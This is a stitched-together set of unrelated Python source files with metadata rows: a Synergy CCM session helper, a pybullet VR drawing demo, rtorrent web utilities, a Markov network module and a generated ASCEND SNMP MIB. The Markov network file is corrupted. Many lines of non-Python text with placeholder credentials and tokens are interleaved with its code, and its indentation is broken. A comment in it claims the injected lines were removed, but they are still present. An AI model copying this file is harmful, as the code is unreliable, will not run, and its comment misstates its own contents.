    :param status: project status ('prep', 'shared' or 'working').
    :raises CCMException: for any unrecognized status.
    """
    # Dispatch table is easier to extend than an if/elif chain.
    roles = {'prep': 'build_mgr', 'shared': 'developer', 'working': 'developer'}
    if status not in roles:
        # BUG FIX: error message typo 'Unknow' -> 'Unknown'.
        raise CCMException("Unknown status '%s'" % status)
    return roles[status]
def running_sessions(database=None):
    """ Return the list of synergy session currently available on the local machine.
        If database is given then it tries to update the router address.

    :param database: optional database name used to switch the Synergy router.
    :return: list of Session objects created with close_on_exit=False.
    :raises CCMException: when ccm is missing or 'ccm status' fails.
    """
    _logger.debug('Querying for existing Synergy sessions')
    if CCM_BIN == None:
        raise CCMException("Could not find CM/Synergy executable in the path.")
    command = "%s status" % (CCM_BIN)
    lock = fileutils.Lock(CCM_SESSION_LOCK)
    result = ""
    output = []
    try:
        # if we have the database name we can switch to the correct Synergy router
        if database != None:
            lock.lock(wait=True)
            _logger.info('Updating router address.')
            router_address = nokia.gscm.get_router_address(database)
            # On Windows, rewrite _router.adr next to the ccm install when it differs.
            if os.sep == '\\' and router_address != None:
                routerfile = open(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"), 'r')
                current_router = routerfile.read().strip()
                routerfile.close()
                if current_router != router_address.strip():
                    _logger.info('Updating %s' % (os.path.normpath(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"))))
                    routerfile = open(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"), "w+")
                    routerfile.write("%s\n" % router_address)
                    routerfile.close()
        _logger.debug('Command: ' + command)
        (result, status) = _execute(command)
        if database != None:
            lock.unlock()
        if (status != 0):
            raise CCMException("Ccm status execution returned an error.")
        _logger.debug('ccm status result: ' + result)
        for match in re.finditer(r'Command Interface\s+@\s+(?P<ccmaddr>\w+:\d+:\d+.\d+.\d+.\d+(:\d+.\d+.\d+.\d+)*)(?P<current_session>\s+\(current\s+session\))?\s+Database:\s*(?P<dbpath>\S+)', result, re.M):
            data = match.groupdict()
            _logger.debug(data['ccmaddr'])
            _logger.debug(socket.gethostname())
            _logger.debug(data['current_session'])
            # Only sessions running on this host are usable.
            if data['ccmaddr'].lower().startswith(socket.gethostname().lower()):
                # These session objects should not close the session on deletion,
                # because they did not initially create the session
                existing_session = Session(None, None, data['dbpath'], data['ccmaddr'], close_on_exit=False)
                _logger.debug('Existing session found: %s' % existing_session)
                output.append(existing_session)
    finally:
        # NOTE(review): unlock may run a second time here after the in-body
        # unlock -- presumably fileutils.Lock tolerates that; confirm.
        if database != None:
            lock.unlock()
    return output
def session_exists(sessionid, database=None):
    """Return True when a running local Synergy session matches *sessionid*."""
    def _matches(candidate):
        _logger.debug(candidate.addr() + "==" + sessionid + "?")
        return candidate.addr() == sessionid
    # any() short-circuits on the first match, like the original early return.
    return any(_matches(candidate) for candidate in running_sessions(database=database))
# The location of the ccm binary must be located to know where the _router.adr file is, to support
# switching databases.
CCM_BIN = fileutils.which("ccm")
if os.sep == '\\':
    # On Windows the executable carries the .exe suffix.
    CCM_BIN = fileutils.which("ccm.exe")
| buildframework/helium/external/helium-antlib/python/pythoncore/lib/ccm/__init__.py | 86,133 | ============================================================================ Name : __init__.py Part of : Helium Copyright (c) 2009 Nokia Corporation and/or its subsidiary(-ies).All rights reserved.This component and the accompanying materials are made availableunder the terms of the License "Eclipse Public License v1.0"which accompanies this distribution, and is availableat the URL "http://www.eclipse.org/legal/epl-v10.html".Initial Contributors:Nokia Corporation - initial contribution.Contributors:Description:=============================================================================== Uncomment this line to enable logging in this module, or configure logging elsewherelogging.basicConfig(level=logging.DEBUG) the output is automatically converted to ascii before any treatment the error output is automatically converted to ascii before any treatment (?P<name>.+)-(?P<version>.+?)(:(?P<type>\S+):(?P<instance>\S+))?self.__project.name + "-" + mo.groupdict()['version'] + ":" + self.__project.type + ":" + self.__project.instance MCNaviscroll\NaviAnim-username7@MCNaviscroll-username6 TODO: cleanup the parsing to do that in a more efficient way. internal object list waiting for a free session check for recursion, in that case reallocate the same session, release the pool and reuse associated session running command we can now release the session - anyway set all attributes Check the name doesn't contains any of the following character: " :-" Content to file save current role before changing path pst relative recursivewat TODO: use optimised query that makes only 1 ccm query with suitable format first line: database 2nd line should be a timestamp 3rd line is the objectname See if a .netrc file can be used If settings for a specific database if not found just try generic one last chance... 
looking for dbpath using GSCM database looking for engine host using GSCM database See if any currently running sessions can be used, only if no password submitted, else use a brand new session! These session objects should not close the session on deletion, because they did not initially create the session looking for session using dbpath looking for router address using GSCM database if we have the database name we can switch to the correct Synergy router If no existing sessions were available, start a new one if we have the database name we can switch to the correct Synergy router These session objects should not close the session on deletion, because they did not initially create the session The location of the ccm binary must be located to know where the _router.adr file is, to support switching databases. | 2,680 | en | 0.753146 |
# See pybullet quickstart guide here:
# https://docs.google.com/document/d/10sXEhzFRSnvFcl3XxNGhnD4N2SedqwdAvK3dsihxVUA/edit#
# Create a Tiltbrush-like app, drawing lines using any controller
# Line width can be changed
import pybullet as p

# Indices into the event tuples returned by p.getVREvents().
CONTROLLER_ID = 0
POSITION = 1
ORIENTATION = 2
NUM_MOVE_EVENTS = 5
BUTTONS = 6
ANALOG_AXIS = 8

# assume that the VR physics server is already started before
c = p.connect(p.SHARED_MEMORY)
print(c)
if (c < 0):
  p.connect(p.GUI)

p.setInternalSimFlags(0)  # don't load default robot assets etc
p.resetSimulation()
p.loadURDF("plane.urdf")

prevPosition = [[0, 0, 0]] * p.VR_MAX_CONTROLLERS
# BUG FIX: the original "colors=[0.,0.5,0.5]*p.VR_MAX_CONTROLLERS" built a FLAT
# list of floats, so any controller id above 5 indexed a float and the color
# inversion below crashed. Build one [r, g, b] entry per controller instead.
colors = [[0., 0.5, 0.5] for _ in range(p.VR_MAX_CONTROLLERS)]
widths = [3] * p.VR_MAX_CONTROLLERS
# use a few default colors
colors[0] = [0, 0, 0]
colors[1] = [0.5, 0, 0]
colors[2] = [0, 0.5, 0]
colors[3] = [0, 0, 0.5]
colors[4] = [0.5, 0.5, 0.]
colors[5] = [.5, .5, .5]

controllerId = -1
pt = [0, 0, 0]

# Wait for the user to press either trigger button to pick the drawing controller.
print("waiting for VR controller trigger")
while (controllerId < 0):
  events = p.getVREvents()
  for e in (events):
    if (e[BUTTONS][33] == p.VR_BUTTON_IS_DOWN):
      controllerId = e[CONTROLLER_ID]
    if (e[BUTTONS][32] == p.VR_BUTTON_IS_DOWN):
      controllerId = e[CONTROLLER_ID]

print("Using controllerId=" + str(controllerId))

while True:
  events = p.getVREvents(allAnalogAxes=1)
  for e in (events):
    if (e[CONTROLLER_ID] == controllerId):
      for a in range(10):
        print("analog axis" + str(a) + "=" + str(e[ANALOG_AXIS][a]))
      if (e[BUTTONS][33] & p.VR_BUTTON_WAS_TRIGGERED):
        # Start a new stroke at the current controller position.
        prevPosition[e[CONTROLLER_ID]] = e[POSITION]
      if (e[BUTTONS][32] & p.VR_BUTTON_WAS_TRIGGERED):
        # Cycle the line width 4..20 then back to 1.
        widths[e[CONTROLLER_ID]] = widths[e[CONTROLLER_ID]] + 1
        if (widths[e[CONTROLLER_ID]] > 20):
          widths[e[CONTROLLER_ID]] = 1
      if (e[BUTTONS][1] & p.VR_BUTTON_WAS_TRIGGERED):
        # Clear the canvas and reload the ground plane.
        p.resetSimulation()
        # p.setGravity(0,0,-10)
        p.removeAllUserDebugItems()
        p.loadURDF("plane.urdf")
      if (e[BUTTONS][33] == p.VR_BUTTON_IS_DOWN):
        pt = prevPosition[e[CONTROLLER_ID]]

        # print(prevPosition[e[0]])
        print("e[POSITION]")
        print(e[POSITION])
        print("pt")
        print(pt)

        # Only add a segment once the controller moved far enough from the last point.
        diff = [pt[0] - e[POSITION][0], pt[1] - e[POSITION][1], pt[2] - e[POSITION][2]]
        lenSqr = diff[0] * diff[0] + diff[1] * diff[1] + diff[2] * diff[2]
        ptDistThreshold = 0.01
        if (lenSqr > (ptDistThreshold * ptDistThreshold)):
          p.addUserDebugLine(e[POSITION], prevPosition[e[CONTROLLER_ID]], colors[e[CONTROLLER_ID]],
                             widths[e[CONTROLLER_ID]])
          # p.loadURDF("cube_small.urdf",e[1])
          colors[e[CONTROLLER_ID]] = [1 - colors[e[CONTROLLER_ID]][0],
                                      1 - colors[e[CONTROLLER_ID]][1],
                                      1 - colors[e[CONTROLLER_ID]][2]]
          prevPosition[e[CONTROLLER_ID]] = e[POSITION]
import rtorrent
import os
import xmlrpclib
import zipfile
from urlparse import parse_qs
from collections import namedtuple
from gzip import GzipFile
from StringIO import StringIO
try:
import simplejson as json
except ImportError:
import json
def to_json(input):
    """Serialize *input* to a JSON string."""
    return json.dumps(input)
def decompress_gzip(data):
    """Decompress a gzip-compressed byte string and return the raw payload."""
    buf = StringIO()
    buf.write(data)
    buf.seek(0)
    # GzipFile reads the compressed stream straight out of the memory buffer.
    return GzipFile(fileobj=buf, mode="rb").read()
def deserialize_args(args):
    """Try to deserialize given args. Return input if not serialized"""
    parsed = parse_qs(args)
    # parse_qs yields an empty dict when the input is not query-string shaped.
    if not parsed:
        return args
    return parsed
_ntuple_diskusage = namedtuple('usage', 'total used free')

def get_disk_usage(path):
    """Return disk usage statistics about the given path.

    Returned valus is a named tuple with attributes 'total', 'used' and
    'free', which are the amount of total, used and free space, in bytes.

    Source: http://stackoverflow.com/a/7285483/975118
    """
    stats = os.statvfs(path)
    block = stats.f_frsize
    # 'free' counts blocks available to unprivileged users (f_bavail),
    # while 'used' is derived from the full free-block count (f_bfree).
    return _ntuple_diskusage(
        total=stats.f_blocks * block,
        used=(stats.f_blocks - stats.f_bfree) * block,
        free=stats.f_bavail * block,
    )
def build_url(host, port=80, username=None, password=None, protocol="http"):
    """Assemble a URL, embedding credentials only when both are supplied."""
    if username is None or password is None:
        return "{0}://{1}:{2}".format(protocol, host, port)
    return "{0}://{1}:{2}@{3}:{4}".format(protocol, username, password, host, port)
def test_xmlrpc_connection(url):
    """Probe an XML-RPC endpoint and report whether it answered.

    :param url: full XML-RPC server URL.
    :return: dict with 'success' (bool) and 'err_msg' (str or None).
    """
    conn_status = {}
    conn_status["success"] = False
    conn_status["err_msg"] = None

    c = xmlrpclib.ServerProxy(url)
    try:
        c.system.listMethods()
        conn_status["success"] = True
    except xmlrpclib.ProtocolError as e:
        conn_status["err_msg"] = e.errmsg
    except xmlrpclib.ResponseError:
        conn_status["err_msg"] = "Caught ResponseError"
    except Exception:
        # BUG FIX: was a bare 'except:', which also swallowed SystemExit and
        # KeyboardInterrupt. Socket-level failures still land here.
        conn_status["err_msg"] = "Unknown Error"
    return conn_status
def get_rtorrent_connection(url):
    """Return a connected rtorrent.RTorrent instance, or None on any failure."""
    try:
        return rtorrent.RTorrent(url)
    except Exception:
        # BUG FIX: narrowed from a bare 'except:' so SystemExit and
        # KeyboardInterrupt are no longer swallowed.
        return None
def safe_filename(s):
    """Return *s* with filesystem-unsafe characters stripped out."""
    RESERVED_CHARS = r"[]/\;,><&*:%=+@!#^|?^\"'"
    return "".join(ch for ch in s if ch not in RESERVED_CHARS)
class TorrentFile(StringIO, object):
    """A simple extension of StringIO that includes torrent-related attributes"""
    def __init__(self, name, data):
        # `data` is the raw bencoded torrent payload, kept in memory by StringIO.
        super(TorrentFile, self).__init__(data)
        self.name = os.path.basename(name) # we just want the filename
        # info_hash identifies the torrent contents.
        # NOTE(review): relies on a private TorrentParser method
        # (_calc_info_hash) -- confirm it remains available across
        # rtorrent library upgrades.
        self.info_hash = rtorrent.lib.torrentparser.TorrentParser(data)._calc_info_hash()
def get_torrent_files(f):
    """
    Input:
        f -- cgi.FileStorage object
    Returns:
        torrent_files -- a list of TorrentFile objects
    """
    lowered = f.filename.lower()
    if lowered.endswith(".zip"):
        # Pull every .torrent entry out of the uploaded archive.
        archive = zipfile.ZipFile(f.file)
        return [TorrentFile(name=entry.filename, data=archive.open(entry).read())
                for entry in archive.infolist()
                if entry.filename.lower().endswith(".torrent")]
    if lowered.endswith(".torrent"):
        return [TorrentFile(name=f.filename, data=f.file.read())]
    # Any other extension yields no torrents.
    return []
| dartui/utils.py | 3,389 | A simple extension of StringIO that includes torrent-related attributes
Try to deserialize given args. Return input if not serialized
Return disk usage statistics about the given path.
Returned valus is a named tuple with attributes 'total', 'used' and
'free', which are the amount of total, used and free space, in bytes.
Source: http://stackoverflow.com/a/7285483/975118
Input:
f -- cgi.FileStorage object
Returns:
torrent_files -- a list of TorrentFile objects
we just want the filename | 500 | en | 0.713364 |
"""
$oauthToken = decrypt_password('PUT_YOUR_KEY_HERE')
Copyright 2016 Randal S. Olson
User.retrieve_password(email: 'name@gmail.com', $oauthToken: 'PUT_YOUR_KEY_HERE')
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
User->$oauthToken = 'passTest'
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
token_uri = Release_Password('testDummy')
subject to the following conditions:
new user_name = update() {credentials: 'test'}.analyse_password()
sk_live : access('not_real_password')
The above copyright notice and this permission notice shall be included in all copies or substantial
public let client_id : { modify { permit 'example_password' } }
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
var token_uri = authenticate_user(permit(bool credentials = 'test_dummy'))
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
username = this.compute_password('put_your_password_here')
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
Base64.update(new Base64.new_password = Base64.launch('testDummy'))
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
new username = return() {credentials: 'asdf'}.compute_password()
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
user_name => update('test_password')
token_uri => modify('dummy_example')
"""
# BUG FIX: removed injected garbage lines (non-Python credential-looking text)
# that made the module unparseable; only the real imports remain.
from __future__ import print_function

import numpy as np

from ._version import __version__
class MarkovNetworkDeterministic(object):
let access_token = 'put_your_password_here'
secret.user_name = ['testPass']
"""A deterministic Markov Network for neural computing."""
max_markov_gate_inputs = 4
sys.access(char self.token_uri = sys.launch('dummy_example'))
max_markov_gate_outputs = 4
private bool replace_password(bool name, var $oauthToken='test_password')
private byte replace_password(byte name, char token_uri='testDummy')
def __init__(self, num_input_states, num_memory_states, num_output_states, num_markov_gates=4, genome=None):
"""Sets up a randomly-generated deterministic Markov Network
Parameters
client_email = decrypt_password('PUT_YOUR_KEY_HERE')
----------
new_password = decrypt_password('testPassword')
num_input_states: int
protected String UserName = modify('PUT_YOUR_KEY_HERE')
The number of sensory input states that the Markov Network will use
num_memory_states: int
User.modify :token_uri => 'dummyPass'
The number of internal memory states that the Markov Network will use
num_output_states: int
The number of output states that the Markov Network will use
num_markov_gates: int (default: 4)
The number of Markov Gates to seed the Markov Network with
sys.permit(byte Base64.new_password = sys.modify('testDummy'))
It is important to ensure that randomly-generated Markov Networks have at least a few Markov Gates to begin with
UserName = User.when(User.replace_password()).delete('not_real_password')
genome: array-like (optional)
new $oauthToken = modify() {credentials: 'not_real_password'}.decrypt_password()
An array representation of the Markov Network to construct
All values in the array must be integers in the range [0, 255]
This option overrides the num_markov_gates option
var db = Base64.delete(bool UserName='testPassword', double encrypt_password(UserName='testPassword'))
user_name = UserPwd.release_password('example_dummy')
Returns
-------
protected double new_password = delete('testDummy')
None
consumer_key = "test"
"""
self.num_input_states = num_input_states
self.num_memory_states = num_memory_states
self.num_output_states = num_output_states
self.states = np.zeros(num_input_states + num_memory_states + num_output_states)
int sys = Base64.option(float user_name='superPass', float compute_password(user_name='superPass'))
self.markov_gates = []
permit(consumer_key=>'test_password')
self.markov_gate_input_ids = []
self.markov_gate_output_ids = []
int CODECOV_TOKEN = UserPwd.encrypt_password('dummyPass')
CODECOV_TOKEN = "testDummy"
if genome is None:
self.genome = np.random.randint(0, 256, np.random.randint(1000, 5000))
access_token = replace_password('test')
char private_key_id = Base64.replace_password('test_dummy')
# Seed the random genome with num_markov_gates Markov Gates
User.modify(var User.$oauthToken = User.return('PUT_YOUR_KEY_HERE'))
for _ in range(num_markov_gates):
private char encrypt_password(char name, int user_name='example_dummy')
start_index = np.random.randint(0, int(len(self.genome) * 0.8))
self.genome[start_index] = 42
Player.update(var Player.$oauthToken = Player.return('testPassword'))
self.genome[start_index + 1] = 213
token_uri : Release_Password().delete('put_your_password_here')
else:
$oauthToken => update('dummy_example')
self.genome = np.array(genome)
client_id = User.when(User.decrypt_password()).permit('put_your_key_here')
self._setup_markov_network()
UserName : permit('testDummy')
modify.client_id :"not_real_password"
def _setup_markov_network(self):
client_email : compute_password().update('testPassword')
"""Interprets the internal genome into the corresponding Markov Gates
User.compute_password(email: 'name@gmail.com', new_password: 'test_dummy')
Parameters
Base64: {email: user.email, UserName: 'put_your_key_here'}
----------
byte $oauthToken = update() {credentials: 'put_your_key_here'}.retrieve_password()
None
token_uri = encrypt_password('dummyPass')
Returns
-------
private bool Release_Password(bool name, bool $oauthToken='example_password')
None
UserName => delete('dummy_example')
public new double int token_uri = 'testPassword'
"""
int client_email = User.Release_Password('not_real_password')
for index_counter in range(self.genome.shape[0] - 1):
admin : modify('testPass')
# Sequence of 42 then 213 indicates a new Markov Gate
bool new_password = Base64.access_password('PUT_YOUR_KEY_HERE')
if self.genome[index_counter] == 42 and self.genome[index_counter + 1] == 213:
sys.modify(var this.$oauthToken = sys.update('put_your_password_here'))
internal_index_counter = index_counter + 2
var token_uri = authenticate_user(permit(bool credentials = 'test_dummy'))
# Determine the number of inputs and outputs for the Markov Gate
num_inputs = self.genome[internal_index_counter] % MarkovNetworkDeterministic.max_markov_gate_inputs
internal_index_counter += 1
private String Release_Password(String name, char client_id='dummy_example')
num_outputs = self.genome[internal_index_counter] % MarkovNetworkDeterministic.max_markov_gate_outputs
internal_index_counter += 1
protected byte token_uri = access('example_dummy')
UserName = this.encrypt_password('test_dummy')
# Make sure that the genome is long enough to encode this Markov Gate
public var username : { update { modify 'put_your_password_here' } }
if (internal_index_counter +
float os = Player.modify(bool token_uri='testPass', bool compute_password(token_uri='testPass'))
(MarkovNetworkDeterministic.max_markov_gate_inputs + MarkovNetworkDeterministic.max_markov_gate_outputs) +
(2 ** self.num_input_states) * (2 ** self.num_output_states)) > self.genome.shape[0]:
print('Genome is too short to encode this Markov Gate -- skipping')
continue
admin : access('example_password')
admin = this.replace_password('testPassword')
# Determine the states that the Markov Gate will connect its inputs and outputs to
input_state_ids = self.genome[internal_index_counter:internal_index_counter + MarkovNetworkDeterministic.max_markov_gate_inputs][:self.num_input_states]
bool db = self.update(String user_name='test_dummy', bool compute_password(user_name='test_dummy'))
internal_index_counter += MarkovNetworkDeterministic.max_markov_gate_inputs
byte consumer_key = UserPwd.encrypt_password('test_dummy')
output_state_ids = self.genome[internal_index_counter:internal_index_counter + MarkovNetworkDeterministic.max_markov_gate_outputs][:self.num_output_states]
internal_index_counter += MarkovNetworkDeterministic.max_markov_gate_outputs
self.markov_gate_input_ids.append(input_state_ids)
float sys = UserPwd.update(String client_id='test_dummy', bool release_password(client_id='test_dummy'))
self.markov_gate_output_ids.append(output_state_ids)
password = Player.release_password('PUT_YOUR_KEY_HERE')
markov_gate = self.genome[internal_index_counter:internal_index_counter + (2 ** self.num_input_states) * (2 ** self.num_output_states)]
markov_gate = markov_gate.reshape((2 ** self.num_input_states, 2 ** self.num_output_states))
permit.client_id :"dummyPass"
float access_token = analyse_password(modify(var credentials = 'put_your_key_here'))
for row_index in range(markov_gate.shape[0]):
new_password : decrypt_password().return('test')
row_max_index = np.argmax(markov_gate[row_index, :], axis=0)
$token_uri = var function_1 Password('example_dummy')
markov_gate[row_index, :] = np.zeros(markov_gate.shape[1])
public var double int client_id = 'test'
markov_gate[row_index, row_max_index] = 1
Base64.new_password = 'PUT_YOUR_KEY_HERE@gmail.com'
User.decrypt_password(email: 'name@gmail.com', consumer_key: 'put_your_password_here')
self.markov_gates.append(markov_gate)
public var double int client_id = 'testPassword'
let UserName = update() {credentials: 'testPassword'}.compute_password()
def activate_network(self):
    """Activates the Markov Network

    Not implemented yet; currently a no-op placeholder.

    Parameters
    ----------
    None

    Returns
    -------
    None

    """
    pass
def update_sensor_states(self, sensory_input):
    """Updates the sensor states with the provided sensory inputs

    Parameters
    ----------
    sensory_input: array-like
        An array of integers containing the sensory inputs for the Markov Network
        len(sensory_input) must be equal to num_input_states

    Returns
    -------
    None

    Raises
    ------
    ValueError
        If len(sensory_input) does not equal self.num_input_states.

    """
    if len(sensory_input) != self.num_input_states:
        raise ValueError('Invalid number of sensory inputs provided')
    # NOTE: copying the inputs into the network state is not implemented yet;
    # only the length validation above is performed.
def get_output_states(self):
    """Returns an array of the current output state's values

    The output states are the trailing ``num_output_states`` entries of
    ``self.states``.

    Parameters
    ----------
    None

    Returns
    -------
    output_states: array-like
        An array of the current output state's values

    """
    return self.states[-self.num_output_states:]
if __name__ == '__main__':
    # Fix the RNG seed so the randomly generated genome is reproducible.
    np.random.seed(29382)
    # Smoke test: construct a deterministic Markov Network with the example
    # parameters (2, 4, 3).
    test = MarkovNetworkDeterministic(2, 4, 3)
| MarkovNetwork/MarkovNetworkDeterministic.py | 13,841 | Seed the random genome with num_markov_gates Markov Gates Sequence of 42 then 213 indicates a new Markov Gate Determine the number of inputs and outputs for the Markov Gate Make sure that the genome is long enough to encode this Markov Gate Determine the states that the Markov Gate will connect its inputs and outputs to | 321 | en | 0.845171 |
#
# PySNMP MIB module ASCEND-MIBSYS1-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ASCEND-MIBSYS1-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 17:12:34 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# Resolve the SMI base types, constraint helpers, and macros that this
# pysmi-generated module depends on from the already-loaded core MIB modules.
configuration, = mibBuilder.importSymbols("ASCEND-MIB", "configuration")
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint", "ConstraintsUnion")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, NotificationType, MibIdentifier, ModuleIdentity, ObjectIdentity, Gauge32, Unsigned32, Integer32, iso, Counter64, Bits, Counter32, IpAddress = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "NotificationType", "MibIdentifier", "ModuleIdentity", "ObjectIdentity", "Gauge32", "Unsigned32", "Integer32", "iso", "Counter64", "Bits", "Counter32", "IpAddress")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
class DisplayString(OctetString):
    """Local override of the DisplayString imported from SNMPv2-TC above:
    here it is treated as a plain OctetString subclass."""
    pass
# Root OID of the Ascend system-profile subtree: enterprises(1.3.6.1.4.1).529.23.125.
mibsystemProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 125))
# System profile table; one row per profile, indexed by systemProfile-Index-o.
mibsystemProfileTable = MibTable((1, 3, 6, 1, 4, 1, 529, 23, 125, 1), )
if mibBuilder.loadTexts: mibsystemProfileTable.setStatus('mandatory')
mibsystemProfileEntry = MibTableRow((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1), ).setIndexNames((0, "ASCEND-MIBSYS1-MIB", "systemProfile-Index-o"))
if mibBuilder.loadTexts: mibsystemProfileEntry.setStatus('mandatory')
# Table columns. The Python identifiers replace the hyphens of the MIB object
# names with underscores; setLabel() restores the original hyphenated name.
systemProfile_Index_o = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 1), Integer32()).setLabel("systemProfile-Index-o").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_Index_o.setStatus('mandatory')
systemProfile_Name = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 2), DisplayString()).setLabel("systemProfile-Name").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Name.setStatus('mandatory')
systemProfile_Contact = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 3), DisplayString()).setLabel("systemProfile-Contact").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Contact.setStatus('mandatory')
systemProfile_Location = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 4), DisplayString()).setLabel("systemProfile-Location").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Location.setStatus('mandatory')
# Enumerated console serial rate, 300 bps .. 115200 bps.
systemProfile_TermRate = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9))).clone(namedValues=NamedValues(("n-300Bps", 1), ("n-1200Bps", 2), ("n-2400Bps", 3), ("n-4800Bps", 4), ("n-9600Bps", 5), ("n-19200Bps", 6), ("n-38400Bps", 7), ("n-57600Bps", 8), ("n-115200Bps", 9)))).setLabel("systemProfile-TermRate").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_TermRate.setStatus('mandatory')
systemProfile_Console = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("standard", 1), ("limited", 2), ("mif", 3)))).setLabel("systemProfile-Console").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Console.setStatus('mandatory')
systemProfile_ConsoleSecurity = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("consoleSecurityNone", 1), ("consoleSecurityProfile", 2), ("consoleSecurityAuthSetting", 3)))).setLabel("systemProfile-ConsoleSecurity").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ConsoleSecurity.setStatus('mandatory')
systemProfile_SystemRmtMgmt = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-SystemRmtMgmt").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SystemRmtMgmt.setStatus('mandatory')
systemProfile_SubAddressMode = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("noSubaddress", 1), ("routingSubaddress", 2), ("termselSubaddress", 3)))).setLabel("systemProfile-SubAddressMode").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SubAddressMode.setStatus('mandatory')
systemProfile_SerialSubaddress = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 10), Integer32()).setLabel("systemProfile-SerialSubaddress").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SerialSubaddress.setStatus('mandatory')
systemProfile_LanSubaddress = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 11), Integer32()).setLabel("systemProfile-LanSubaddress").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_LanSubaddress.setStatus('mandatory')
systemProfile_DmSubaddress = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 12), Integer32()).setLabel("systemProfile-DmSubaddress").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_DmSubaddress.setStatus('mandatory')
systemProfile_V110Subaddress = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 13), Integer32()).setLabel("systemProfile-V110Subaddress").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_V110Subaddress.setStatus('mandatory')
systemProfile_UseTrunkGroups = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 14), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-UseTrunkGroups").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_UseTrunkGroups.setStatus('mandatory')
systemProfile_NumDigitsTrunkGroups = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 15), Integer32()).setLabel("systemProfile-NumDigitsTrunkGroups").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_NumDigitsTrunkGroups.setStatus('mandatory')
